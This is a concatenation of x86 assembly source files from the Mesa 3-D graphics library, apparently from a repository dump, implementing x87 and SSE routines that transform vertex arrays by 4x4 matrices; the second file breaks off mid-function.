MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_gr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC2 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT11 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FLD_S( SRC3 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT14 )
FLD_S( SRC3 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT15 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FSTP_S( DST0 ) /* F6 F5 F7 */
FXCH( ST(1) ) /* F5 F6 F7 */
FSTP_S( DST1 ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p4_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_gr_loop) )
LLBL(x86_p4_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_perspective )
HIDDEN(_mesa_x86_transform_points4_perspective)
GLNAME( _mesa_x86_transform_points4_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F0 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F6 F1 F0 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F6 F5 F4 */
FADDP( ST0, ST(4) ) /* F1 F6 F5 F4 */
FADDP( ST0, ST(2) ) /* F6 F5 F4 */
FLD_S( SRC3 ) /* F2 F6 F5 F4 */
FMUL_S( MAT14 )
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC2, EBX )
XOR_L( CONST(-2147483648), EBX )/* change sign */
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_pr_loop) )
LLBL(x86_p4_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_3d )
HIDDEN(_mesa_x86_transform_points4_3d)
GLNAME( _mesa_x86_transform_points4_3d ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_3dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FLD_S( SRC3 ) /* F0 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT14 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC3, EBX )
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_3dr_loop) )
LLBL(x86_p4_3dr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME(_mesa_x86_transform_points4_3d_no_rot)
HIDDEN(_mesa_x86_transform_points4_3d_no_rot)
GLNAME(_mesa_x86_transform_points4_3d_no_rot):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_3dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_3dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC3 ) /* F0 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT14 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC3, EBX )
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_3dnrr_loop) )
LLBL(x86_p4_3dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_2d )
HIDDEN(_mesa_x86_transform_points4_2d)
GLNAME( _mesa_x86_transform_points4_2d ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_2dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_2dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FLD_S( SRC3 ) /* F0 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F5 F4 */
FMUL_S( MAT13 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
MOV_L( SRC2, EBX )
MOV_L( SRC3, EBP )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( EBP, DST3 )
LLBL(x86_p4_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_2dr_loop) )
LLBL(x86_p4_2dr_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_2d_no_rot )
HIDDEN(_mesa_x86_transform_points4_2d_no_rot)
GLNAME( _mesa_x86_transform_points4_2d_no_rot ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_2dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_2dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC3 ) /* F0 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F5 F4 */
FMUL_S( MAT13 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
MOV_L( SRC2, EBX )
MOV_L( SRC3, EBP )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( EBP, DST3 )
LLBL(x86_p4_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_2dnrr_loop) )
LLBL(x86_p4_2dnrr_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_identity )
HIDDEN(_mesa_x86_transform_points4_identity)
GLNAME( _mesa_x86_transform_points4_identity ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_ir_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
CMP_L( ESI, EDI )
JE( LLBL(x86_p4_ir_done) )
ALIGNTEXT16
LLBL(x86_p4_ir_loop):
MOV_L( SRC0, EBX )
MOV_L( SRC1, EDX )
MOV_L( EBX, DST0 )
MOV_L( EDX, DST1 )
MOV_L( SRC2, EBX )
MOV_L( SRC3, EDX )
MOV_L( EBX, DST2 )
MOV_L( EDX, DST3 )
LLBL(x86_p4_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_ir_loop) )
LLBL(x86_p4_ir_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 15,767
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform3.S
|
/* $Id: sse_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_general)
HIDDEN(_mesa_sse_transform_points3_general)
GLNAME( _mesa_sse_transform_points3_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
CMP_L ( CONST(0), ECX ) /* count == 0 ? */
JE ( LLBL(K_GTPGR_finish) ) /* yes -> nothing to do. */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS ( REGOFF(0, EDX), XMM0 ) /* m0 | m1 | m2 | m3 */
MOVAPS ( REGOFF(16, EDX), XMM1 ) /* m4 | m5 | m6 | m7 */
MOVAPS ( REGOFF(32, EDX), XMM2 ) /* m8 | m9 | m10 | m11 */
MOVAPS ( REGOFF(48, EDX), XMM3 ) /* m12 | m13 | m14 | m15 */
ALIGNTEXT32
LLBL(K_GTPGR_top):
MOVSS ( REGOFF(0, ESI), XMM4 ) /* | | | ox */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox | ox */
MOVSS ( REGOFF(4, ESI), XMM5 ) /* | | | oy */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy | oy */
MOVSS ( REGOFF(8, ESI), XMM6 ) /* | | | oz */
SHUFPS ( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz | oz */
MULPS ( XMM0, XMM4 ) /* m3*ox | m2*ox | m1*ox | m0*ox */
MULPS ( XMM1, XMM5 ) /* m7*oy | m6*oy | m5*oy | m4*oy */
MULPS ( XMM2, XMM6 ) /* m11*oz | m10*oz | m9*oz | m8*oz */
ADDPS ( XMM5, XMM4 )
ADDPS ( XMM6, XMM4 )
ADDPS ( XMM3, XMM4 )
MOVAPS ( XMM4, REGOFF(0, EDI) )
LLBL(K_GTPGR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTPGR_top) )
LLBL(K_GTPGR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_identity)
HIDDEN(_mesa_sse_transform_points3_identity)
GLNAME( _mesa_sse_transform_points3_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTPIR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
CMP_L( ESI, EDI )
JE( LLBL(K_GTPIR_finish) )
ALIGNTEXT32
LLBL(K_GTPIR_top):
MOVLPS ( S(0), XMM0 )
MOVLPS ( XMM0, D(0) )
MOVSS ( S(2), XMM0 )
MOVSS ( XMM0, D(2) )
LLBL(K_GTPIR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTPIR_top) )
LLBL(K_GTPIR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_3d_no_rot)
HIDDEN(_mesa_sse_transform_points3_3d_no_rot)
GLNAME(_mesa_sse_transform_points3_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* - | - | m13 | m12 */
MOVSS ( M(10), XMM3 ) /* - | - | - | m10 */
MOVSS ( M(14), XMM4 ) /* - | - | - | m14 */
ALIGNTEXT32
LLBL(K_GTP3DNRR_top):
MOVLPS ( S(0), XMM0 ) /* - | - | s1 | s0 */
MULPS ( XMM1, XMM0 ) /* - | - | s1*m5 | s0*m0 */
ADDPS ( XMM2, XMM0 ) /* - | - | +m13 | +m12 */
MOVLPS ( XMM0, D(0) ) /* -> D(1) | -> D(0) */
MOVSS ( S(2), XMM0 ) /* sz */
MULSS ( XMM3, XMM0 ) /* sz*m10 */
ADDSS ( XMM4, XMM0 ) /* +m14 */
MOVSS ( XMM0, D(2) ) /* -> D(2) */
LLBL(K_GTP3DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP3DNRR_top) )
LLBL(K_GTP3DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_perspective)
HIDDEN(_mesa_sse_transform_points3_perspective)
GLNAME(_mesa_sse_transform_points3_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(8), XMM2 ) /* - | - | m9 | m8 */
MOVSS ( M(10), XMM3 ) /* m10 */
MOVSS ( M(14), XMM4 ) /* m14 */
XORPS ( XMM6, XMM6 ) /* 0 */
ALIGNTEXT32
LLBL(K_GTP3PR_top):
MOVLPS ( S(0), XMM0 ) /* oy | ox */
MULPS ( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
MOVSS ( S(2), XMM5 ) /* oz */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* oz | oz */
MULPS ( XMM2, XMM5 ) /* oz*m9 | oz*m8 */
ADDPS ( XMM5, XMM0 ) /* +oy*m5 | +ox*m0 */
MOVLPS ( XMM0, D(0) ) /* ->D(1) | ->D(0) */
MOVSS ( S(2), XMM0 ) /* oz */
MULSS ( XMM3, XMM0 ) /* oz*m10 */
